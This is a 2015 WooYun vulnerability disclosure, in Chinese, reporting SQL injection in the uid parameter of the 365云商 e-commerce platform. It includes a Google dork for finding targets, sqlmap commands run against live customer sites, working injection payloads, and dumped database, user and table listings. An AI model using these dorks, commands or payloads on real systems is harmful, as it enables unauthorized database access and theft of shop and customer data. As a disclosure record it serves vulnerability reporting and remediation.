当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132365

漏洞标题:365云商平台通用型sql注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: xiaohe

提交时间:2015-08-13 13:45

修复时间:2015-09-28 16:06

公开时间:2015-09-28 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

365云商平台通用型sql注入漏洞,涉及十几家平台使用电商平台商家,求高rank,求礼物。

详细说明:

首先说说如何发现此漏洞吧,
inurl:cart.jsp?id=
出来第一位就是购物车-365云商平台,看来点击率挺高的嘛,好,测试测试,附上链接
http://**.**.**.**/site/cart.jsp?uid=10036&id=aknp2928vc38jjul
上单引号
http://**.**.**.**/site/cart.jsp?uid=10036'&id=aknp2928vc38jjul
返回302并且跳转到错误页面
http://**.**.**.**/500.jsp?message=java.lang.Exception%3A+java.lang.Exception%3A+com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException%3A+Unknown+column+%2710036%C3%A2%E2%82%AC%CB%9C%27+in+%27where+clause%27
看来有戏,放sqlmap中跑跑

./sqlmap.py -u "http://**.**.**.**/site/cart.jsp?uid=10038&id=aknp2928vc38jju" --proxy="**.**.**.**:80" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" -p uid --code=200 -v 1


Parameter: uid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=10038 AND 5183=5183&id=aknp2928vc38jju
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=10038 AND (SELECT * FROM (SELECT(SLEEP(5)))HAKj)&id=aknp2928vc38jju
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


从官网得知此平台有相关案例客户,好吧,随机找个客户电商网站来试试,深圳市子情贝诺移动商城也使用此平台,附上URl

http://**.**.**.**/site/prod_class.jsp?uid=1000&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95


放进sqlmap

./sqlmap.py -u "http://**.**.**.**/site/prod_class.jsp?uid=1000&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95" --proxy="**.**.**.**:80" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" -p uid --code=200 -v 1


---
Parameter: uid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=1000 AND (SELECT 5798 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(5798=5798,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))JDFn)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
---


漏洞证明:

跑库

---
Parameter: uid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=1000 AND (SELECT 5798 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(5798=5798,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))JDFn)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
---
back-end DBMS: MySQL 5.0
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] test
[*] world
[*] yx_yunshang


跑用户

database management system users [2]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'


跑表

---
Parameter: uid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=1000 AND (SELECT 5798 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(5798=5798,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))JDFn)&id=k9in3usoscp0ceql&class_id=ncsenwlauh3briek&name=%E9%B2%9C%E6%9E%9C%E8%9B%8B%E7%B3%95
---
back-end DBMS: MySQL 5.0
Database: yx_yunshang
[111 tables]
+-------------------------+
| t_area                  |
| t_book                  |
| t_book_recd             |
| t_brand                 |
| t_card                  |
| t_card_privilege        |
| t_card_user             |
| t_class                 |
| t_combo                 |
| t_combo_class           |
| t_combo_delivery        |
| t_combo_group           |
| t_combo_order           |
| t_coupon                |
| t_coupon_user           |
| t_delivery              |
| t_dept                  |
| t_favorite              |
| t_goods                 |
| t_group_buy             |
| t_group_buy_item        |
| t_group_buy_list        |
| t_hotel_order           |
| t_hotel_room            |
| t_images                |
| t_index_flow            |
| t_list                  |
| t_lottery               |
| t_lottery_item          |
| t_lottery_record        |
| t_material              |
| t_material_class        |
| t_news                  |
| t_opp                   |
| t_order                 |
| t_order_item            |
| t_order_refund          |
| t_page                  |
| t_pic                   |
| t_prod_flow             |
| t_product               |
| t_product_class         |
| t_product_share_recd    |
| t_ques_answer           |
| t_ques_option           |
| t_shake_list            |
| t_site                  |
| t_site_page             |
| t_sm_interact_recd      |
| t_sms_send_recd         |
| t_social_media_interact |
| t_spec                  |
| t_spic                  |
| t_staff                 |
| t_store                 |
| t_store_resource        |
| t_survery               |
| t_survery_ques          |
| t_survery_recd          |
| t_system                |
| t_tickets               |
| t_unit                  |
| t_unit_recharge_recd    |
| t_user                  |
| t_user_buy              |
| t_user_buy_use          |
| t_user_msg              |
| t_user_point            |
| t_user_point_use        |
| t_user_store            |
| t_video_source          |
| t_weixin_set            |
| t_weixin_set_list       |
| t_word                  |
| t_wx_msg_recive_recd    |
| t_wx_reply_msg_recd     |
| t_wx_right_protect_recd |
| t_wx_warn               |
| t_xiaoepay_record       |
| t_xiaoepay_set          |
| t_yx_auction            |
| t_yx_auction_order      |
| t_yx_auction_record     |
| t_yx_credit_record      |
| t_yx_heka               |
| t_yx_magazine           |
| t_yx_magazine_content   |
| t_yx_magazine_section   |
| t_yx_margin_record      |
| t_yx_meeting            |
| t_yx_meeting_user       |
| t_yx_promotion          |
| t_yx_promotion_recd     |
| t_yx_vote               |
| t_yx_vote_user          |
| t_yx_wprize             |
| t_yx_wprize_user        |
| t_zhifb_set             |
| t_zhifb_set_list        |
| v_auction_margin_r      |
| v_card_user             |
| v_coupon_user           |
| v_favorite              |
| v_order                 |
| v_order_item            |
| v_product_class         |
| v_product_class_s       |
| v_staff                 |
| v_user_buy              |
| v_user_buy_use          |
| v_user_card             |
+-------------------------+


好累,就此为止吧,root权限还可能会Getshell,再继续我怕我停不下来,我想静静,也别问我静静是谁。

修复方案:

过滤敏感字符,其他的你们懂的,求高rank,求礼物。

版权声明:转载请注明来源 xiaohe@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-08-14 16:05

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无